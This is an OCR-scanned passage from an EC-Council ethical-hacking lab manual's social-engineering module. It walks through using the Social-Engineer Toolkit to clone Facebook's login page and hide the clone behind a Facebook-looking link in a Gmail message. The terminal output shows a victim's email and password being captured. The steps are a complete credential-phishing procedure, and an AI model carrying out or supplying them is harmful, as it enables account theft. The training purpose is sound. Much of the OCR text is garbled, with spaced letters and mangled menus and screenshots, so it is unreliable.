J o in us on i r c .f r e e n o d e .n e t i n channel # s e « J o lk it
The S o c ia l-E n g in e e r T o o lk it i s a p rodu ct o f Tru sted S ec.
V is it: h ttp s ://w w w .tru s te d 5 e c .c o m
S e le c t from th e menu:
J 1) Social-Engineering Attacks I _
2) F a s t-T ra c k P e & t r a t i o n T e s tin g
3 ‫ י‬T h i r d p.nrty Modules
4) Update the M e ta s p lo it Sranei/ork
5 ) Update th e S o c ia l-E n g in e e r T o o lk it
6 ) Update SET c o n fig u r a tio n
7) H e lp , C r e d it s , and About
99) E x it th e S o c ia l-E n g in e e r T o o lk it
FIGU RE 3.3: SET Main menu
A list o f m e n u s 111 S o cia l-E n g in ee rin g A tta ck s w ill ap p ear; ty p e 2 an d
p ress Enter to select W ebsite A ttack V ectors.
E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]

C Q t i ! e Social-Engineer
Toolkit "Web Attack"
vector is a unique way of
utilizing multiple web-
based attacks in order to
compromise the intended
victim.
6.
0 3 T11e Credential
Harvester M ethod will
utilize web cloning o f a
website that has a username
and password field and
harvest all die information
posted to die website.
7.
C E H L ab M anual Page 693
Module 09 - Social Engineering
« T e rm in a l
File Edit View Terminal Help
J o in us on i r c .f r e e n o d e .n e t in channel # s e to o lk t1
The S o c ia l-E n g in e e r T o o lk it i s a p rodu ct o f Tru sted S ec.
V is it: h ttp s ://w w w .tru s te d s e c .c o m
S e le c t from th e menu:
1) S p e a r-P h is h in q A tta c k Vec to r s
| 2) W ebsite A tta c k V e c to rs |
3) I n fe c tio u s Media G en erato r
4 ) C re a te a Payload and L is te n e r
_ 5) Hass M a ile r A tta c k ‫ן‬ _
I 6 ) A rduino-B ased A tta c k v e c to r g
|^ % S M S S p oofing A tta c k V e c t o r ♦ ^ I A
8) W ir e le s s Access P o in t A tta c k V e c to r
9 ) QRCode G en erato r A t t a c | V e c to r
10) P o w ersh e ll A tta c k V e c tlr s
11) T h ir d P a rty Modules
99) R eturn back to th e main menu.
>r5s _______________________________
FIGURE 3.4: Social Engineering Attacks menu
111 th e n e x t set o f m e n u s th a t ap p ears, type 3 a n d p ress Enter to select
th e Credential Harvester Attack Method
File Edit View Terminal Help
and th e B a ck|T rack team . T h is method u t i l i z e s !fra m e replacem ents to
1
make th e h ig h lig h te d URL l i n k to appear l e g it i m a te however *tf en c lic k e d
a window pops up then i s re p la c e d w ith th e m a lic io u s l i n k . You can e d i t
th e l i n k replacem ent s e ttin g s in th e set^ c o n F ig i f i t s to n fc *k o « /fa s t.
The M u lt i-A t t a c k method w i l l add a co m binatio n o f a tta c k s through th e web a tta c
k Jr
menu. For example you can u t i l i z e th e Java A p p le t, M e ta s p lo it Browser,
C r e d e n t ia l H a rv e s te r/T a b n a b b in g , and th e Man L e f t in th e M id d le a tta c k
a l l a t once to see which i s s u c c e s s fu l. m.
1) Java A p p le t A tta c k Method
2) M e ta s p lo it Browser E x p lo it Method
I3) Credential Harvester Attack Method |
ack
4) Tabnabbing Attack Method
5 ) Man l e f t i n th e M id d le A tta c k Method
6) Web Jacking A tta c k Method
7 ) M u l t i - A t tack Web HethoJ
8) V ic tim Web P r o f i l e r
9 ) C re a te o r im p o rt a CodeSigning C e r t i f i c a t e
99) Return to Main Menu
s e t :w eb attackj3B 1
FIGURE 3.5: website Attack Vectors menu
U
N o w , type 2 an d p ress Enter to select th e S ite Cloner o p tio n fro m th e
m enu.
E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]

C Q t 11e Site Cloner is used
to d o n e a website o f your
choice.
COS t 11e tabnabbing attack
method is used when a
victim has multiple tabs
open, when the user clicks
die link, die victim will be
presented with a “Please
wait while the page loads”.
W hen the victim switches
tabs because h e/she is
multi-tasking, the website
detects that a different tab
is present and rewrites die
webpage to a website you
specify. The victim clicks
back on the tab after a
period o f time and diinks
diey were signed out o f
their email program or their
business application and
types the credentials in.
W hen the credentials are
inserts, diey are harvested
and the user is redirected
back to the original
website.
C E H L ab M anual Page 694
Module 09 - Social Engineering
« T e rm in a l
File Edit View Terminal Help
9 ) C re a te o r im p o rt a CodeSigning M
99) R eturn to Main Menu
s e t : w e b a tta c k >3
The f i r s t method w i l l a llo w SET to im p o rt‫ *!' ׳‬l i s t o f p r e -d e fin e d web
a p p lic a t io n s t h a t i t can u t i l i z e w it h in th e a t ta c k .
The second method w i l l c o m p le te ly c lo n e a w e b s ite o f your choosing
and a llo w you to u t i l i z e th e a t ta c k v e c to rs w it h in th e c o m p le te ly
same web a p p lic a t io n you were a tte m p tin g to c lo n e .
I h e t h i r d method aU ow s y o u jto im p o rt your own w e b s ip ;, n ote t ^ a t you
Should o n ly have alt' in d e x .h tm l when using th e im p o rt W ebsite
f u n c t io n a lit y ^ ^ * Y jF ♦ ^ I V •) / ‫׳‬ ‫י‬
1) Web T em plates v I ^ 3 4
12) S i t e C lo n e r ! I \
3) Custom Im p o rt - ■«‫״‬
99) R eturn to W ebattack Menu
;e t:w e b a tta c k a E f|_______________
FIGU RE 3.6: Credential Harvester Attack menu
T y p e th e IP ad d ress o f y o u r B a ck T rac k v iru ia l P C 111 th e p r o m p t to r IP
add ress for th e POST back in Harvester/Tabnabbing a n d p ress Enter.
111 tins exam ple, th e IP is 10.0.0.15
* T e rm in a l
File Edit View Terminal Help
a p p lic a t io n s t h a t i t can u t i l i z e w it h in th e a t t a c k .
The second method w i l l c o m p le te ly c lo n e a w e b s ite o f your choosing
and a llo w you to u t i l i z e th e a t ta c k v e c to rs w it h in th e co m p le te ly
same web a p p lic a t io n you were a tte m p tin g to c lo n e .
The t h i r d method a llo w s you to im p o rt you r own w e b s ite , n ote t h a t you
should o n ly have an in d e x .h tm l when using th e im p o rt w e b s ite
f u n c t io n a l it y .
1) Web Tem plates
2 ) S i t e C lo n e r
3) Custom Im p o rt _ '
1 9 9 ) R eturn to W eb A ta c k Menu I / . * | ^
J[jLS‫־‬ir br r3
t -1 C r e d e n tia l h a r v e s te r w i l t a llo w you to u t i l i z e th e clone c a p a b i l i t i e s w it h in
set ‫ן‬ J
[-1 t o h a rv e s t c r e d e n tia ls o r p aram eters from a w e b s ite as w e ll as p ie c e them in
to a re p o rt *
[-1 T h is o p tio n i s used f o r what IP th e s e r v e r w i l l POST t o .
[ -J I f y o u 'r e using an e x t e r n a l I P , use your e x t e r n a l IP f o r t h is
: > IP address for the POST back in Harvester/Tabnabbina:110.0.0.15|
FIGU RE 3.7: Providing IP address in H arvester/Tabnabbing
N o w , y o u w ill be p ro m p te d fo r a U R L to b e clo n ed , type th e d esired
U R L fo r Enter th e url to clo n e a n d p ress Enter. 111 tin s ex am p le, w e
h av e u se d w w w .fa ceb o o k .co m . T in s w ill n n tia te th e clo n in g o f th e
sp ecified w eb site.
E th ical H a ck in g a nd C o untenneasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]

C Q t 11e web jacking attack
method will create a
website clone and present
the victim with a link
stating that the website has
moved. This is a new
feature to version 0.7.
10. A fte r clo n in g is c o m p le te d , th e h ig h lig h ted m essage, as sh o w n 111 th e
11. I t w ill sta rt C red e n tia l H arv ester.
1333If you ’re doing a
penetration test, register a
name that’s similar to the
victim, for Gmail you could
do gmail.com (notice the
1), something similar diat
can mistake the user into
thinking it’s die legitimate
12. L eave th e C red e n tia l H a rv e ste r A tta c k to fetc h in fo rm a tio n fro m th e
C E H L ab M anual Page 695
Module 09 - Social Engineering
* T e rm in a l
File Edit View Terminal Help
and a llo w you to u t i l i z e th e a t ta c k v e c to rs w it h i n th e c o m p le te ly
same web a p p lic a t io n you w ere a tte m p tin g t o c l o n e T ^ ^ ^ ^ ^ ^ ^
The t h i r d method a llo w s you to im p o r t-y m jr own w e b s ite , n o te t h a t you
should o n ly have an in d e x .h tm l when usin g th e im p o rt w e b s ite
f u n c t io n a l it y .
1) Web Tem plates
2) S i t e C lo n e r
3) Custom Im p o rt
99) R eturn to W ebattack Menu
:w eb a tta c k >2 —
[•] C r e d e n tia l h a r v e s te r w i l l a llo w you to u t i l i z e t h e c lo n e c a p a b il i t i e s w it h i r
J[ ‫] ־‬r to> h a rv e s t
c r e d e n tia ls
1 TJ T
o r param eters f rom a w e b s ite as w e ll as p la c e them ir
to a r e p o r t I ^ ■ % I % ■ I V J 1
[-] T h is o p tio n i s used f o3r r A
| hhaa t IP th e s e rv e r w i l l POST t o . V ^ M
[■ ] I f y o u 'r e using an e x t e r n a l IP , use your e x t e r n a l IP f o r t h i s
s e t :w eb a tta c k > IP address f o r th e POST back in H a rv e s te r/T a b n a b b in g : 1 0 . 0 . 0 . 1 5
[ • ] SET sup ports both HTTP and HTTPS
[ - ] Example: h t t p : //w w w . t h is is a f a k e s i t e . com____________
; e t :w eb atta ck> E n te r th e u r l to c lo n e :Rvww. fa c e b o o k . com!
FIGU RE 3.8: Providing URL to be cloned
follow ing sc re e n sh o t, w ill a p p e a r o n th e Terminal screen o t SET. P ress
Enter to co ntinue.
File Edit View Terminal Help
99) R eturn to W ebattack Menu
s e t :w e b a tta c k >2 51
[-1 C r e d e n t ia l h a r v e s te r w i l l a llo w you to u t i l i z e th e c lo n e c a p a b il i t i e s w it h in
SET
[ - ] to h a rv e s t c r e d e n tia ls o r param eters from a w e b s ite as w e ll as p la c e them in
to a r e p o rt
[ - ] T h is o p tio n i s used f o r what IP th e s e r v e r w i l l POST t o .
t -J I f y o u 'r e using an e x t e r n a l I P , use you r e x t e r n a l IP f o r t h is
s e t :w e b a tta c k > IP address f o r th e POST back i n H a rv e s te r /T a b n a b b in g :1 0 .0 .0 .1 5
{ - ] SET sup ports both HTTP and HTTPS
I - ] Example: h t tp ://w w w .th is is a f a k e s it e .c o m I
s e t : w e b a tta c k > E n te r th e u r l to c lo n e :www.facebook.com
b ■ ‫—ך‬ .
[*] C lo n in g th e w e b s ite : h t t p s ://lo g in .fa c e b o o k .c o m /lo g in .p h p
[*j T h is cou ld ta k e a l i t t l e b i t . . . 1 I J
Trie b e » « v Ttoaie fteu ■tfm .k i J 11 fo k c -‫י‬ ,
f i e l d s a re a v a il a b l e . R e g a rd le s s , K h i POSTs on a w e b s ite .
[ ! ] I have read th e above message.
Press < r e tu r i to c o n tin u e
FIGU RE 3.9: SET Website Cloning
v ic tim ’s m achine.
E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]

m W hen you hover over
the link, die URL will be
presented with the real
URL, not the attacker’s
machine. So for example if
you’re cloning gmail.com,
the URL w hen hovered
over it would be gmail.com.
W hen die user clicks the
moved link, Gmail opens
and then is quickly replaced
with your malicious
Webserver. Remember you
can change the timing of
the webjacking attack in die
config/set_config flags.
13. N o w , y o u h a v e to se n d th e IP address o f y o u r B a ck T rack m a ch in e to a
14. F o r tins d em o , la u n c h y o u r w e b b ro w se r 111 th e B a ck T rack m a ch in e ;
0 =5!Most o f die time they
w on’t even notice the IP
but it’s just another way to
ensure it goes on w ithout a
hitch. N ow that the victim
enters the username and
password in die fields, you
will notice that we can
intercept the credentials
now.
15. Place th e c u rso r 111 th e b o d y o f t 1e em ail w h e re y o u w ish to p lace th e
C E H L ab M anual Page 696
Module 09 - Social Engineering
* T e rm in a l
File Edit View Terminal Help
[ - ] C r e d e n t ia l h a r v e s te r w i l l a llo w you to u t i l i z e th e c lo n e c a p a b i l i t i e s w it h in
SET
[ - ] t o h a rv e s t c r e d e n tia ls o r p aram eters from a w e b s ite as w e ll as p la c e them in
to a r e p o rt ——
[■ ] T h is o p tio n i s used f o r what IP th e s e r v e r w i l l POST t o . _ * a * * '
[ - ] I f y o u 'r e using an e x t e r n a l I P , use you r e x t e r n a l IP f o r t h is
s e t :w e b a tta c k > IP address f o r th e POST back i n H a r v e s t e r / T a b n a b b i n g : l # ^ ^ ^ ^ ^
[ - ] SET sup ports both HTTP and HTTPS
[-1 Example: h t t p : //w w w .th is is a f a k e s it e .c o m
s e t :w e b a tta c k > E n te r th e u r l to c lo n e :www.facebook.com
[*] C lo n in g th e w e b s ite : h t t p s ://lo g in .fa c e b o o k .c o m /lo g in .p h p
[*j T h is could ta k e a l i t t l e b i t . . .
The bea t way to use t h i s a t t a c k i » i f sername and pas sw o rd torm
f i e l d s f t r g ava i l a b l e . R e j r d l e s s . ■ h i f tp t u r e s a l POSTs A a webs
I ' l l have read th e above message.
Press to co n tin u e
‫ ] ׳‬S o c ia l-E n g in e e r T o o lk i t C r e d e n t ia l H a rv e s te r A tta c k
, j C r e d e n t ia l H a rv e s te r i s running on p o r t 80
■] In fo rm a tio n w i l l be d is p la y e d to you as i t a r r iv e s below:
FIGU R E 3.10: SET Credential Harvester Attack
victim an d trick h im o r h e r to click to brow se th e IP ad d ress.
la u n c h y o u r fav o rite em ail service. 111 th is ex am p le w e h av e u se d
w w w .gm ail.com . L o g in to y o u r gm ail a c c o u n t a n d c o m p o se an email.
FIGURE 3.11: Composing email in Gmail
CO
lake U R L . T h e n , click th e Link icon.
E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

‫ א‬C o m p o s e M ail —« ‫־‬ 9) • >flma 1l.c o m * C m a il • M o z illa F ire to x

Ejle Edit yiew History flook marks Ipols Help

S' ‫ן‬ ^ f i http‫״‬ google.com/n^il, T C | 121▼ Google Q,

|Ba:kTrack Lnux l i * nsiwe Security |lE x p lo it‫־‬DB ^A ircrack-n g J^SomaFM

Gmail Documents Calendar More •

0 + Share
G 0 v ‫׳‬g l e
Discard Lab«h‫»־‬ Draft autosaveti at 10:4a AM (0 minutes ago) o

° - j@yahoo.com, I
Inbox
Add Cc Add Bcc
SUrrwJ
Important Su bject @TOI F - Party Pictures
Sert Mail
Attach a no
Drafts (2)
►Circles ‫ ־‬b I y T ‫ ־‬rT * A ‫| © • ־ד ־‬o o |i= }= •5 is ‫י י‬ * * ^ I* « Plain Toxt chock spoiling■‫״‬

Hoilo Sam.
PI»4m» click this link lo view tt>*♦ w»#»kt»11d (vtrty pictures at TGIF wflh thw cmMxMim*

Regards.
m.
Search chat or SU'

9‫«י‬

FIGURE 3.12: Linking Fake URL to Actual URL

16. 111 th e Edit Link w in d o w , first type th e actu al ad d ress in th e Web

add ress field u n d e r th e Link to o p tio n a n d th e n type th e fake U R L 111
th e T ext to display held. 111 tins ex am p le, th e w eb ad d re ss w e h av e
u se d is http://10 .0.0.15 a n d tex t to d isplay is
w w w .facebook.com /R ini TGIF. C lick OK
‫׳־י‬ ‫ א‬C o m p o s e M ail ‫ •■■■ ■■«<■» ־‬. ‫) ן‬g )g m ail.co m - C m a il • M o z illa F ire to x
tile Edit yiew History flookmarks !pols Help
IM CCompose Mail *

3 !5 ‫■ ״‬ ra p ‫• ־‬ googie.com ▼© I f l r Google Q.

(BackTrack Lnux ensi we Security ||F x p lo it‫־‬DB ^A ircrack-n g j ^ r>omaFM

»Rlni Search Images Maps Play YouTube

G o .)g Ie
Draft eutosaved at 10:45 AM (0 minutes ago)

Inbox
X
Starred
Important E d it Link
Sent Ma!
Drafts (2) Toxt to aiepiay: L w (vfacehook coaVRinl TGIf J Q

Circles U r* to. To what URL should this link go?

JunkE-mal 0 Web address |wtp0.0.15 10‫־‬/‫ | ׳‬Q

C Email * * ♦‫י י•־‬ T*‫>״‬l this in*

Not sure wrhat lo pul In the boxT r m fhd t**■imgean the t*ob far you wanr lo Ink to (A
acarcAcnainc nvotit be useful.) Then coo rtc acb addNsa from me box h your browser's
acMroso Qor and potto it 140 tno box aoov•

| OK | Cared

FIGU RE 3.13: Edit Link window

17. T h e fake U R L sh o u ld a p p e a r 111 th e em ail b o d y , as sh o w n 111 th e

follow ing screen sh o t.

C E H L ab M anual Page 697 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

‫ א‬Com pose Mail ‫—» ־‬............. • (g>gma1l.com * Cmail • Mozilla Firefox

Ejle Edit History flook marks Ipols Help

|Ba:kTrack Linux |*|Offensive Security |[JjExploit-DB ^A ircrack-n g jgjjSomaFM

G 0 v ‫׳‬g l e
Saved Discard Labels •»‫־‬ Draft autnsaved at 11:01 AM (0 minutes ago) 0 ‫־‬

c a The Credential
To @yahoo com, B
Harvester M ethod will Inbox
Add Cc Add Bcc
SUrred
utilize web cloning o f a Important Subjed (QTGIF - Party Pictures
website that has a username Sert Mail
Attach a 10‫ת‬
Drafts (2)
and password field and
►Circles Sf ‫ ־‬B I U T - »T - A, • T - © oo | - IE 3 is H « =3 ^ , piain roxt chock spoiling■'
harvest all die information
hello Sam.
posted to the website.
P1-*m» click this Ilfikj ivivw U:»|>r11* t:<m1.Rlnl TfilFjlo vlt‫״‬w Ih* <1 parly picturws at TGIF wilh lh» celatarttlM

Koqaroe.

Search 1
9*

FIGURE 3.14: Adding Fake URL in the email content

18. T o v erity th a t th e fake U R L is linked to th e actual U R L , click th e fake

U R L a n d it w ill display th e actual U R L as Go to link: w ith th e actual
U R L . S end th e em ail to th e in te n d e d user.
•‫־‬ x C om pose M a il - • • -• ipg m m l.co m - G m ail • M o z illa F ire fo x
File Edit yie* History gookmarks !0015 Help
M Compose Mail -

V 5r' oogle.com r g | |>|t r.ocinle Q, (g

Q B d ikT ta ckU n u * OffensiveSecurity |lE xplo it-D B KA ircrack-ng |£SomdFM

ages Maps Play YouTube

G o u g le + Share [ ‫]־‬

Discard Labels » Draft autosaved at 11:01 AM (0 minutes ago) 0•

@yahoo.c
Inbox
Add Cc Add Bcc
Starred
m In some cases when Important Sucjecl @TGI F - Party Pictures
Sert Ms
you’re performing an Drafts (2)
Attach a no
advanced social-engineer Circles ‫מ‬ ■ B I U T • tT * A ‫ ־‬T • © M jE IE •= 1 ‫ ׳‬M E = 1 / x « Plain Text Check Spelling-
attack you may want to JunkE-mal
register a domain and buy
Please click this link ww\v.facebQ0k.CQm<Rini TGIF to view the weekend party pictures at TGIF with the celebrities
an SSL cert that makes die rcpgjrcfc | Go to link. Mlp:f/10.0.0. 1y - Chanoe Remove y |
attack more believable. You
can incorporate SSL based
attacks with SET. You will
need to turn the
WEBATTACK_SSL to
O N . If you want to use
self-signed certificates you
can as well however there
will be an “u n tru sted ”
FIGURE 3.15: Actual URL linked to Fake URL
warning when a victim goes
to your website
19. W h e n th e v ic tim clicks th e U R L , h e o r she will be p re se n te d w ith a
replica o f Facebook.com

20. T h e v ictim w ill b e en ticed to en te r 111s o r h e r u ser n a m e an d p assw o rd

in to th e fo rm fields as it ap p ears to be a g en u in e w ebsite. W h e n th e
v ic tim en ters the U sernam e an d Passw ord an d clicks Log In, it do es
n o t allow logging in; in stead , it red irects to th e legitim ate F a c e b o o k
login page. O b serv e th e U R L in th e brow ser.

C E H L ab M anual P ag e 698 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

m H ie multi-attack f a c e b o o k

vector allows you to turn Sign Up Connect and share w ith th e people in you r Ife.
on and off different vectors
and combine the attacks all
into one specific webpage.
So w hen the user clicks the
link he will be targeted by T a rp b o o k 1o g in

each o f the attack vectors

(mart or t*hon*:
you specify. O ne tiling to
note with the attack vector Password: ---------

is you can’t utilize | 1Keep me lowed in

Tabnabbing, Cred or Siga up for tacetoook

Harvester, or Web Jacking
Forgot your osss*vord?
with the Man Left in the
Middle attack.
fcngist‫!) ־‬kwo fflOj®Oge =33and Rrtugjes (=t

F3Lcb5x S 2012 Moble ‫ ־‬Find Friends ‫ ־‬Eodces People ‫ ־‬Poqcs Afccut Crca* cr Ad Create a Page ‫־‬Developers Careers ‫ ־‬Privacy Coatses Terre

m
Q lo g 1n|h>c«book \

1 <‫ ־‬H C S|hnp3:;;www.face&oolccom/10gin.php| \ 1

| ^ Do you want Google Chrome to save your password? | Saver password Never for this site •<

f a c e b o o k

Skjn Up CuarMH.1 a n d slur** w ltli Ilu* ptMipk* 111 y o u r lit*.

F acebook Login
m The multi attack
vector utilises each Emai or Phone; |

combination o f attacks and Password:

allows the user to choose □ Keep me logged m
the method for the attack. c» Sum up for r«c^book
O nce you select one o f the
forgot rout D»s*crcP
attacks, it will be added to
your attack profile to be
Cnglab (US] VMI 4n-JI Ov/u &Aj<BD£« [ x a 'd Pwtuoje* Ow O r ‫־‬arKab (France)
used to stage the attack
vector. W hen you’re
finished be sure to select Faeaboofc Z 2012 ModI* ‫ ׳‬hind S-n*ndc ‫ ׳‬Batigcc - ■«pl« -Hg*c -/•tout j *1‫׳‬ar Ad Craaca a P«g* -L'«/*cp«rc - Lar**rc -!*rvacy 4 ‫ ׳‬Cask** • l«r‫־‬r*
the I ’m finished' option.

FIGU RE 3.16: Fake and Legitimate Facebook login page

21. A s so o n th e v ic tim types 111 th e em ail ad d re ss a n d p as sw o rd , th e SET

Terminal 111 B a ck T rack fetc h es th e ty p ed u se r n a m e a n d p assw o rd ,
w h ic h ca n be u se d by an attac k er to g am u n a u th o riz e d access to th e
v ic tim ’s a c co u n t.

C E H L ab M anual Page 699 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]

m Social Engineer
Toolkit Mass E-Mailer
There are two options on
the mass e-mailer; the first
would be to send an email
to one individual person.
The second option will
allow you to import a list
and send it to as many
people as you want widiin
that list.
22. P ress CTRL+C to g en e rate a r e p o rt to r tins atta c k p erfo rm ed .
m The multi-attack will
add a combination o f
attacks through the web
attack menu. For example
you can utilize die Java
Applet, Metasploit
Browser, Credential
Harvester/Tabnabbing,
and the Man Left in the
Middle attack all at once to
see which is successful.
Lab Analysis
A nalyze an d d o c u m e n t d ie results related to d ie lab exercise.
C E H L ab M anual Page 700
Module 09 - Social Engineering
* ‫׳י‬ * Terminal
File Edit View Terminal Help
[ * ] S o c ia l-E n g in e e r T o o lk it C r e d e n t ia l H a rv ester‫ ־‬A ttack.
[ * j C r e d e n t ia l H a rv e s te r i s running on p o r t 80
[ * j In fo rm a tio n w i l l be d is p la y e d to you as i * ‫ י‬- - ‫ ״ ץ י ~ י‬h r l " “ ‫־‬ —
1 0 . 0 . 6 .2 - - [2 6 /S e p /2 0 1 2 1 1 :1 0 :4 1 ] “GET / H T T P /1 .1 “ 200 -
[ * ] WE GOT A H IT ! P r in t in g th e o u tp u t:
PARAH: lsd=AVqgmkGh
PARAH: r e tu r n session=0
PARAH: le g a c y r e t u r n = l
PARAM: d is p la y ‫־‬
PARAH: session key only=0
PARAH: trynu!n=l
PARAH c h a rs e t t e s t = € , ‫ ׳‬fl,€
PARAH tim ezo n e= -330
PARAH lgnrnd=224034 ArY/U
PARAH
0OSSI
p o s s ib K § = tc s fe l2 | r f I
PARAH: d e f a u l t p e rs is te n t= ‫־‬Q
POSSIBLE USERNAHE FIELD FOUND: lo « .n = L o g + In
[» ) WHEN YOU'RE FINISHED, H IT CONTROL-C TO GENERATE A REPORT.
FIGURE 3.17: SET found Username and Password
/v v x Terminal
File Edit View Terminal Help
PARAH: lsd=AVqgmkGh
PARAH: r e tu r n session=0
PARAM: le g a c y r e t u r n = l
PARAM: d is p la y ‫־‬
PARAM: ses sion key only=0
PARAH: tr y n u »=l 1
PARAH: c h a rs e t t e s t = € , / K ,fl,€
PARAH: tiraezo n e=-540
PARAH: Ig n rnd=224034 ArYA
PARAH: lg n js = n
POSSIBLE USERNAHE FIELD FOUND: e ma i l ‫•' ׳ — ־‬
POSSIBLE PASSWORD FIELD FOUND: p as s= test
PARAH: d e f a u lt p e r s is te n t= 0
POSSIBLE USERNAHE FIELD FOUND: l g in = L g+In 0 0
[ * ] WHEN YOU'RE F IN IS H E D -H IT C0N1R0L-C
C TO GENERATE A REPOftf.
L . I x
'C [ * ] ftle
exp o rte d t o r J w k* tSs //2200Kf t -- 00 99- -2f6t 1
1 5 ::4 9 :1 5 .S 4 f t l 5 . l f » L f o r your
HaIE
R s n **
M r w l W I V W l W A V f I X -‫ך‬
[ • ] F i l e in XHL fo rm a t exp o rted t ( | r e p o r ts /2 0 1 2 -0 9 -2 6 1 5 :4 9 :1 5 .5 4 6 4 l ^ .x
j r read in g p l e a s u r e . . .
Press < r e t u r 1 to c o n tin u e
FIGU RE 3.18: Generating Reports duough SET
E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

T o o l/U tility I n f o r m a tio n C o l l e c t e d / O b j e c t i v e s A c h ie v e d

PA R A M : lsd= A V qgm kG 11
P A R A M : re tu rn _ s e s s io n = 0
PA R A M : le g ac y _ re tu rn = 1
P A R A M : d is p la y s
PA R A M : se ssio n _ k e y _ o n ly = 0
S o c ia l PA R A M : try n u m = 1
E n g in e e rin g
PA R A M : ch a rse t_ te st= € ,',€ ,',
T o o lk it
PA R A M : tim e z o n e = -5 4 0
PA R A M : lg n rn d = 2 2 4 0 3 4 _ A rY A
PA R A M : lg n js = n

e m a il= sa m c h o a n g @ y a h o o .c o m
p a s s = te s t@ 1 2 3

PLEASE TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S

RE L A T E D TO T H I S LAB.

Questions
1. E valuate each o f th e follow ing P aros p ro x y options:

a. T ra p R equest

b. T ra p R esponse

c. C ontinue b u tto n

d. D ro p b u tto n

I n t e r n e t C o n n e c t io n R e q u ir e d

0 Y es □ No

P la tf o r m S u p p o r te d

0 C la s s r o o m □ !Labs

C E H L ab M an u al Page 701 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]